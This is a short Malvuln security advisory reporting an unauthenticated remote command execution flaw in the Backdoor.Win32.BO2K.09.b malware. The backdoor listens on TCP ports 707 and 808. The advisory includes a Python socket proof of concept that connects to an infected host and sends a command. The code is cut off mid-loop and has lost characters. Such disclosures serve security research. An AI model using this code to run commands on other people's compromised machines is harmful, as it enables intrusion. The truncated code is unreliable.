Authored by malvuln | Site malvuln.com

Backdoor.Win32.BO2K.09.b malware suffers from a code execution vulnerability.

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/90894ac48059687ea80e565f7529e53f.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BO2K.09.b
Vulnerability: Unauthenticated Remote Command Execution
Description: Backdoor BO2K.09.b listens on TCP ports 707 and 808. Third party adversarys who can reach the system, can execute any command on the infected host using sockets or get a remote shell using telnet, curl etc.
Type: PE32
MD5: 90894ac48059687ea80e565f7529e53f
Vuln ID: MVID-2021-0120
Dropped files:
Disclosure: 03/02/2021

Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=707
CMD="calcn"

def doit():
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST,PORT))
except Exception as e:
print(str(e))

res=""

while True:
res = s.recv(128)
print(res)
if "n" in res or "